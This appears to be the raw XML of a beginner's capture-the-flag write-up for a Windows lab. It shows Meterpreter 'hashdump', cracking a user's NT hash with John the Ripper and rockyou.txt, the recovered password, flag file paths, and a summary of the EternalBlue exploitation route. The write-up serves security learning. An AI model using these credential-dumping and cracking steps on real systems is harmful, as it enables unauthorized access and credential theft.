            <wp:extent cx="4453890" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17644171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17176" name="draw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39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B26">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="299" w:beforeAutospacing="0" w:after="299" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Task 4 – Dump &amp; Crack Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D160590">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:i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Step 1: Dump Password Hashes  ---&gt; </w:t>
      </w:r>
      <w:r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  <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEFAFA7">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/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Step 2: Identify Non-default User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01657A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consola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Non-default User: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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Jon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCEFC15">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4704715" cy="2505075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12753582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58256" name="draw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84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FAC2">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/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Step 3: Crack Jon’s Password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E569D3">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/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 xml:space="preserve">By using : </w:t>
      </w:r>
      <w:r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  <w:t>echo "ffb43f0de35be4d9917ac0cc8ad57f8d" &gt; jon.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE7200A">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/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</w:pPr>
      <w:r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  <w:t>john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jon.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E827944">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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color w:val="C00000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i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reveals the plaintext password for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Jon --&gt; which is:alqfna22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042072FB">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75217655">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1">
                <w14:lumMod w14:val="100000"/>
                <w14:lumOff w14:val="0"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5093335" cy="2711450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12027033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03378" name="draw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3560" cy="27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4C0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="299" w:beforeAutospacing="0" w:after="299" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Task 5 – Find Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952C7CE">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/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Flag Locations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BAD8BF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="281" w:beforeAutospacing="0" w:after="281" w:afterAutospacing="0"/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Flag1 – System Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A430A67">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consola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Path: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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>C:\Windows\System32\flag1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F0555A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs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Flag:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag{system_root_access}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179639AA">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3622040" cy="2573020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21168179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7965" name="drawi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171" cy="25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3CA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="281" w:beforeAutospacing="0" w:after="281" w:afterAutospacing="0"/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Flag2 – SAM / Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9823C8">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consola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Path: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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>C:\Windows\System32\config\SAM_backup.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA449B">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs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Flag:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>flag{sam_database_elevated_access}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B118F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3508375" cy="2632710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19755626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2685" name="drawi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494" cy="26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3083">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="281" w:beforeAutospacing="0" w:after="281" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Flag3 – Admin / Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E19B4F6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Path:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>C:\Users\Administrator\Documents\flag3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C2137C">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>flag{admin_documents}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E06E958">
      <w:p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In this room, we practiced exploiting a Windows machine as beginners.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> We learned how to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3AB7A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Scan the target with Nmap and identify open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B52CB15">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Exploit the MS17-010 (EternalBlue) vulnerability using Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A011515">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Upgrade a shell to Meterpreter and escalate privileges to SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C2617">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Dump and crack password hashes using hashdump and John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E50E9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing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  <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Locate key files (flags) in important system locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B49EED">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C525C0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0E4791">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="27880881">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="34B60DC1">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A14298E">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5907B0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B326DB5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/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 w14:paraId="1EB56988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005" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="19415C55">
          <w:pPr>
            <w:pStyle w:val="8"/>
            <w:bidi w:val="0"/>
            <w:ind w:left="-115"/>
            <w:jc w:val="left"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3005" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="54A59C7B">
          <w:pPr>
            <w:pStyle w:val="8"/>
            <w:bidi w:val="0"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3005" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="61123B13">
          <w:pPr>
            <w:pStyle w:val="8"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="13FA91B2">
    <w:pPr>
      <w:pStyle w:val="7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5"/>
      <w:gridCol w:w="3005"/>
      <w:gridCol w:w="3005"/>
    </w:tblGrid>
    <w:tr w14:paraId="4331E267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005" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="28C2F44E">
          <w:pPr>
            <w:pStyle w:val="8"/>
            <w:bidi w:val="0"/>
            <w:ind w:left="-115"/>
            <w:jc w:val="left"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3005" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="78C05B4A">
          <w:pPr>
            <w:pStyle w:val="8"/>
            <w:bidi w:val="0"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3005" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="4E5BBD9A">
          <w:pPr>
            <w:pStyle w:val="8"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="4D21CE43">
    <w:pPr>
      <w:pStyle w:val="8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EE304"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00AEE30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57A9B1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="057A9B1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C763D2E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C763D2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37C9B71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="137C9B71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49D86ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="249D86E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6D6AD7C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26D6AD7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9E79338"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39E7933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C4F3EB0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C4F3EB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459FAE23"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="459FAE2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A9DE8EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A9DE8E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1A8F056"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51A8F05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5CEFE3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65CEFE3C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6C5D4457"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C5D445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6FA262DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FA262D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7128C9E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7128C9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12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="9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871DB8"/>
    <w:rsid w:val="00AF6728"/>
    <w:rsid w:val="00F0D780"/>
    <w:rsid w:val="010EDFD7"/>
    <w:rsid w:val="018CFD60"/>
    <w:rsid w:val="03D00BE0"/>
    <w:rsid w:val="05A7A0E3"/>
    <w:rsid w:val="083676D3"/>
    <w:rsid w:val="08845654"/>
    <w:rsid w:val="090C6BD7"/>
    <w:rsid w:val="0A2E7D0B"/>
    <w:rsid w:val="0B1E5112"/>
    <w:rsid w:val="0B6B01DB"/>
    <w:rsid w:val="0D404FBC"/>
    <w:rsid w:val="0D522424"/>
    <w:rsid w:val="0E9D2BAB"/>
    <w:rsid w:val="10156EB3"/>
    <w:rsid w:val="114CB935"/>
    <w:rsid w:val="11875463"/>
    <w:rsid w:val="13C580CF"/>
    <w:rsid w:val="1638CDE5"/>
    <w:rsid w:val="1659E156"/>
    <w:rsid w:val="17F0DAC6"/>
    <w:rsid w:val="1A31BAA0"/>
    <w:rsid w:val="1AAF6440"/>
    <w:rsid w:val="1CA547B4"/>
    <w:rsid w:val="1CF73D41"/>
    <w:rsid w:val="1DE47C83"/>
    <w:rsid w:val="1FD86CAA"/>
    <w:rsid w:val="21DFA6EB"/>
    <w:rsid w:val="22AB08D3"/>
    <w:rsid w:val="2306C1B1"/>
    <w:rsid w:val="2602142A"/>
    <w:rsid w:val="26327E6E"/>
    <w:rsid w:val="273EE600"/>
    <w:rsid w:val="275639D2"/>
    <w:rsid w:val="27E8C0B1"/>
    <w:rsid w:val="2811EE2D"/>
    <w:rsid w:val="289E0065"/>
    <w:rsid w:val="29E964B7"/>
    <w:rsid w:val="2BAD35FD"/>
    <w:rsid w:val="2CEFE6A6"/>
    <w:rsid w:val="2E2250D2"/>
    <w:rsid w:val="2E4FDDC9"/>
    <w:rsid w:val="2F42C9D1"/>
    <w:rsid w:val="307BBAC8"/>
    <w:rsid w:val="31802FBC"/>
    <w:rsid w:val="320442D0"/>
    <w:rsid w:val="3284DD3A"/>
    <w:rsid w:val="33E5F876"/>
    <w:rsid w:val="35D807C4"/>
    <w:rsid w:val="3623AE97"/>
    <w:rsid w:val="37B99694"/>
    <w:rsid w:val="389E5F39"/>
    <w:rsid w:val="38F7F4B9"/>
    <w:rsid w:val="3934F3C5"/>
    <w:rsid w:val="396E560F"/>
    <w:rsid w:val="39BA0E23"/>
    <w:rsid w:val="3B1538FC"/>
    <w:rsid w:val="3B9895BE"/>
    <w:rsid w:val="3D3D0ACD"/>
    <w:rsid w:val="3D7EB782"/>
    <w:rsid w:val="3DA26A5E"/>
    <w:rsid w:val="3EC0F026"/>
    <w:rsid w:val="3F2DC753"/>
    <w:rsid w:val="3F58AAA8"/>
    <w:rsid w:val="3FED0C6F"/>
    <w:rsid w:val="40AB8CA8"/>
    <w:rsid w:val="40D73521"/>
    <w:rsid w:val="425DFCCA"/>
    <w:rsid w:val="429001E5"/>
    <w:rsid w:val="43649129"/>
    <w:rsid w:val="437D1662"/>
    <w:rsid w:val="43A0642C"/>
    <w:rsid w:val="4490D056"/>
    <w:rsid w:val="44B01A48"/>
    <w:rsid w:val="450174CA"/>
    <w:rsid w:val="45AA92B2"/>
    <w:rsid w:val="45FF6B1E"/>
    <w:rsid w:val="46CAE9AE"/>
    <w:rsid w:val="46E643B2"/>
    <w:rsid w:val="470F8AAE"/>
    <w:rsid w:val="471284AB"/>
    <w:rsid w:val="474DBEFA"/>
    <w:rsid w:val="482F730E"/>
    <w:rsid w:val="48711B70"/>
    <w:rsid w:val="49AC343C"/>
    <w:rsid w:val="4A2233F2"/>
    <w:rsid w:val="4AC860A1"/>
    <w:rsid w:val="4BF2E6A0"/>
    <w:rsid w:val="4C1893C4"/>
    <w:rsid w:val="4C53F1B7"/>
    <w:rsid w:val="4EBD19C3"/>
    <w:rsid w:val="4FC6DF88"/>
    <w:rsid w:val="50BA00D0"/>
    <w:rsid w:val="513C846A"/>
    <w:rsid w:val="52129E3E"/>
    <w:rsid w:val="5253150D"/>
    <w:rsid w:val="52BEBB07"/>
    <w:rsid w:val="52C4DC44"/>
    <w:rsid w:val="5396C1D9"/>
    <w:rsid w:val="55154F89"/>
    <w:rsid w:val="55B89831"/>
    <w:rsid w:val="563D8337"/>
    <w:rsid w:val="574005B9"/>
    <w:rsid w:val="577B6275"/>
    <w:rsid w:val="58367114"/>
    <w:rsid w:val="58438C8D"/>
    <w:rsid w:val="58D8CB9B"/>
    <w:rsid w:val="590C848B"/>
    <w:rsid w:val="5AA5327A"/>
    <w:rsid w:val="5B7D2FBB"/>
    <w:rsid w:val="5C849398"/>
    <w:rsid w:val="5CE4DBD2"/>
    <w:rsid w:val="5D4D1DEA"/>
    <w:rsid w:val="5E5D863E"/>
    <w:rsid w:val="60E83B57"/>
    <w:rsid w:val="621C2E36"/>
    <w:rsid w:val="63760C90"/>
    <w:rsid w:val="63D24223"/>
    <w:rsid w:val="640015B7"/>
    <w:rsid w:val="65F14AED"/>
    <w:rsid w:val="687FAAB9"/>
    <w:rsid w:val="6A4592EE"/>
    <w:rsid w:val="6B64E859"/>
    <w:rsid w:val="6B915055"/>
    <w:rsid w:val="6C457E79"/>
    <w:rsid w:val="6C83BF07"/>
    <w:rsid w:val="6CA8DC76"/>
    <w:rsid w:val="6CFCB157"/>
    <w:rsid w:val="6D4BA4FF"/>
    <w:rsid w:val="6D871DB8"/>
    <w:rsid w:val="6E9F0F4E"/>
    <w:rsid w:val="6F00FD4E"/>
    <w:rsid w:val="704342B1"/>
    <w:rsid w:val="70F67A93"/>
    <w:rsid w:val="71172E83"/>
    <w:rsid w:val="71E96A81"/>
    <w:rsid w:val="7247E813"/>
    <w:rsid w:val="727E370D"/>
    <w:rsid w:val="73673A94"/>
    <w:rsid w:val="751E7078"/>
    <w:rsid w:val="76A7FAE1"/>
    <w:rsid w:val="77121CD7"/>
    <w:rsid w:val="77132B07"/>
    <w:rsid w:val="77831259"/>
    <w:rsid w:val="7783BBBE"/>
    <w:rsid w:val="77B8B1AC"/>
    <w:rsid w:val="781EBED8"/>
    <w:rsid w:val="791C54A8"/>
    <w:rsid w:val="7C05E6F9"/>
    <w:rsid w:val="7D8E6779"/>
    <w:rsid w:val="7E61754E"/>
    <w:rsid w:val="7E790193"/>
    <w:rsid w:val="7F474FB5"/>
    <w:rsid w:val="7FA59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GB" w:eastAsia="ja-JP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160" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
